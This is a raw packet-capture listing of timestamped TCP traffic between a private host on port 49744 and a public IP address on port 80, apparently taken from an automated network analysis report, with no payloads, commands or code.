Dec 30, 2024 15:53:35.351594925 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.351604939 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.351624966 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.351665020 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.351667881 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.351679087 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.351690054 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.351720095 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.351850033 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.351861954 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.351881981 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.351891041 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.351897001 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.351902962 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.351912022 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.351917028 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.351922989 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.351939917 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.351949930 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.351950884 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.351958990 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.351967096 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.351969004 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.351974964 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.351979971 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.352052927 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.352133036 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.352137089 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.352150917 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.352161884 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.352173090 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.352183104 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.352195024 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.352210999 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.352226973 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.352256060 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.352272034 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.352274895 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.352283001 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.352293015 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.352309942 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.352334023 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.352363110 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.352375031 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.352385998 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.352405071 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.352415085 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.352440119 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.352461100 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.362015009 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.362032890 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.362046003 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.362056017 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.362067938 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.362078905 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.362090111 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.362096071 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.362139940 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.362617970 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.395153046 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.395168066 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.395180941 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.395211935 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.395257950 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.395272017 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.395283937 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.395308018 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.395330906 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.395407915 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.395418882 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.395433903 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.395452023 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.395464897 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.395471096 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.395478010 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.395484924 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.395488977 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.395500898 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.395507097 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.395550013 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.395811081 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.395823002 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.395834923 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.395863056 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.395904064 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.395983934 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.395996094 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.396002054 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.396008968 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.396051884 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.396070957 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.396323919 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.396334887 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.396346092 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.396373987 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.396397114 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.396411896 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.396425009 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.396456957 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.396456957 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.396469116 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.396476984 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.396496058 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.396517992 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.396550894 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.396563053 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.396593094 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.396617889 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.396634102 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.396696091 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.396697044 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.396708012 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.396759033 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.396792889 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.396805048 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.396816015 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.396827936 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.396840096 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.396845102 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.396861076 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.396888018 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.396908998 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.396920919 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.396969080 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.396985054 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.396995068 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.397006989 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.397032976 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.397100925 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.397111893 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.397121906 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.397134066 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.397145033 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.397146940 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.397157907 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.397180080 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.397197962 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.397284985 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.397298098 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.397310019 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.397324085 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.397335052 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.397344112 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.397376060 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.397389889 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.397403002 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.397413969 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.397438049 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.397536993 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.397550106 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.397557020 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.397567987 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.397579908 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.397588015 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.397598028 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.397610903 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.397618055 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.397622108 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.397634029 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.397656918 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.397674084 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.397859097 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.397871971 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.397883892 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.397896051 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.397903919 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.397913933 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.397944927 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.438268900 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.438317060 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.438332081 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.438353062 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.438359022 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.438380003 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.438429117 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.438442945 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.438456059 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.438486099 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.438502073 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.438513994 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.438524961 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.438533068 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.438544989 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.438556910 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.438570023 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.438602924 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.438621998 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.438637018 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.438649893 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.438661098 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.438673019 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.438694954 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.438716888 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.438730001 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.438741922 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.438761950 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.438791990 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.438813925 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.438827038 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.438838959 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.438851118 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.438862085 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.438874960 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.438889980 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.438946009 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.438956976 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.438968897 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.438991070 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.439007044 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.439011097 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.439023018 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.439065933 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.439088106 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.439100981 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.439130068 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.439203024 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.439215899 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.439225912 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.439268112 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.444982052 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.444996119 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.445008039 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.445029020 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.445055962 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.445132017 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.445144892 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.445161104 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.445184946 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.448688030 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.448724031 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.448738098 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.448781967 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.448788881 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.448801041 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.448810101 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.448812962 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.448846102 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.448847055 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.448898077 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.617094994 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.621941090 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.621973038 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.621990919 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.622028112 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.622065067 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.622081041 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.622097969 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.622112036 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.622143030 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.622240067 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.622256994 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.622272968 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.622289896 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.622298002 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.622332096 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.622365952 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.622381926 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.622397900 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.622416019 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.622423887 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.622431040 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.622445107 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.622461081 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.622462034 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.622483015 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.622486115 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.622529984 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.622580051 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.622601032 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.622617006 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.622632980 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.622649908 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.622653961 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.622678041 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.622730970 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.622749090 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.622775078 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.622951031 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.622972965 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.622989893 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.622999907 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.623006105 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.623020887 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.623030901 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.623037100 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.623053074 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.623069048 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.623076916 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.623083115 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.623099089 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.623106956 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.623114109 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.623121977 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.623128891 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.623145103 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.623152018 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.623159885 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.623177052 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.623188019 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.623223066 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.623414993 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.623430014 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.623445034 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.623461008 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.623470068 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.623476982 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.623492002 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.623506069 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.623512030 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.623522043 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.623537064 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.623545885 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.623553038 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.623564959 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.623569012 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.623584986 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.623594999 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.623629093 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.623776913 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.623792887 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.623807907 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.623831987 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.623836040 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.623874903 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.623938084 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.623960972 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.623981953 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.623996973 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.624012947 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.624025106 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.624028921 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.624044895 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.624061108 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.624068975 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.624074936 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.624088049 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.624089956 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.624104023 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:35.624104977 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:35.624120951 CET	80	49744	185.215.113.16	192.168.2.4
